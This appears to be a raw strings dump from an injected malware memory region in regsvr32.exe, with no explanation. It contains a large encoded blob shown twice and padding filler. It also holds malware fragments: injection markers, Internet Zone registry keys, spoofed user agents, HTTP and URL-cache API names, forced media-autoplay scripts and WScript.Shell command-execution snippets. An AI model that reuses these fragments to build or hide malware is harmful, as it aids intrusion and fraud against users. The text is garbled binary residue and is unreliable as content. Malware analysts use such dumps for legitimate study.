Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
c:\%original file name%.exe path<<c:\%original file name%.exe>>path inj_ffile<<:2:>>inj_ffile

regsvr32.exe_436_rwx_00080000_000C2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
2 2*393
7:8?8[8`8
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
